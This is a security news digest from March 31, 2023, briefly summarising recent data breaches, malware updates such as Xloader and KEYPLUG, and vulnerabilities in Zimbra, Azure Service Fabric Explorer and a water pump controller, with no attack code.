Daily Threat Intelligence – March 31 – 2023
Email inboxes of NATO, diplomats, and government and military officials are being targeted by an APT group whose operations appear to be in support of Russian and Belarussian geopolitical goals. The threat group is scanning for unpatched Zimbra instances to gain access to their emails. In another headline, cybercriminals were observed exploiting a high-severity cross-site scripting issue in Microsoft’s Azure Service Fabric Explorer. Security experts found both Linux and Windows clusters vulnerable to the attack, which may lead to the system takeover.
Speaking of security bugs, researchers flagged unpatched flaws in water pumping systems made by the U.S.-based ProPump and Controls. Experts claim dozens of controllers are exposed on the internet; some of the flaws in those can be exploited without authentication.
Top Breaches Reported in the Last 24 Hours
Student’s payment data compromised
Students at Cornell University had their credit and debit card information exposed after its ticketing software vendor, AudienceView, experienced an unsolicited network intrusion. The incident has also impacted other colleges and universities, including SUNY Oswego, Ithaca College, Colorado State University, Virginia Tech University, Loyola University Chicago, and McMaster University in Canada. In some instances, students have also lost money in the hacking incident.
Breach impacts 4.8 million individual
TMX Finance and its subsidiaries TitleBucks, TitleMax, and InstaLoan have jointly announced suffering a data breach, blurting out the personal data of 4,822,580 customers. An investigation concluded that the attackers pilfered client information between February 3rd and 14th, 2023. Compromised data involves full name, passport number, driver’s license number, federal/state identification card number, tax identification number, financial account information, and more.
ADD flaw jeopardizes sensitive data
Configuration issues in Microsoft’s Azure Active Directory (AAD) exposed Bing to threat actors who could subvert the search engine results at their will. Wiz researchers discovered the mishap and claimed that it could also potentially leak data from Outlook emails, calendars, SharePoint, Teams, and OneDrive files. The bug was fixed in late February.
Top Malware Reported in the Last 24 Hours
Xloader gets un update
The developers of Xloader information stealer have rolled a new version of the malware that boasts additional obfuscation techniques and other modifications. Originally released in January 2023, the malware is known to have several encryption layers to protect critical parts of code and data from analysis by security vendors. However, the primary algorithms that all the versions of the malware share are a custom RC4 algorithm, a custom buffer decryption algorithm, and a custom SHA1 hash.
Chinese actors use KEYPLUG backdoor
RedGolf, a Chinese state-sponsored threat, is using a custom Windows and Linux backdoor known as KEYPLUG. Some campaigns by the Winnti group (APT43), whose threat activity overlaps with RedGolf, also involved the use of KEYPLUG, stated Recorded Future’s Insikt Group. Google-owned Manidant first disclosed the use of KEYPLUG by Chinese threat actors in March 2022.
Top Vulnerabilities Reported in the Last 24 Hours
CISA orders patch notice
The CISA urged federal agencies to patch security vulnerabilities including zero-days recently disclosed by Google TAG, roughly within three weeks. A pair of attack campaigns are abusing the bugs to install commercial spyware on iOS and Android devices. CVE-2021-30900, CVE-2022-38181, CVE-2023-0266, CVE-2022-3038, and CVE-2022-22706 were added to the CISA KEV catalog.
APT hunts for Zimbra bug
The Winter Vivern APT group was seen abusing a bug in the Zimbra Collaboration software to obtain secrets from the email inboxes of government agencies in European countries. The group uses scanning technologies like Acunetix to find unpatched webmail portals to attack potential victims. The XSS bug, CVE-2022-27926, impacts Zimbra Collaboration version 9.0.0.
Severe Azure Service flaw
Researchers from Orca Security shared detail of a sensitive XSS flaw, dubbed Super FabriXss, affecting Microsoft’s Azure Service Fabric Explorer component. The exploitation of the bug, CVE-2023-23383, could allow an attacker to execute arbitrary code, gain administrative control of critical systems, and cause other significant damage. It has been addressed by Microsoft in a recent Patch Tuesday update.
Security lapse in water pump system
Multiple vulnerabilities were reported in Osprey Pump Controller, a water pumping system by ProPump and Controls. The different types of vulnerabilities include remote code execution, cross-site request forgery (CSRF), authentication bypass, cross-site scripting (XSS), command injection, backdoor access, file disclosure, and session hijacking issues. The CISA also issued an alert on this threat last week.
A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.
If you like the site, please support us on “Patreon” or “Buy Me A Coffee” using the buttons below
To keep up to date follow us on the below channels.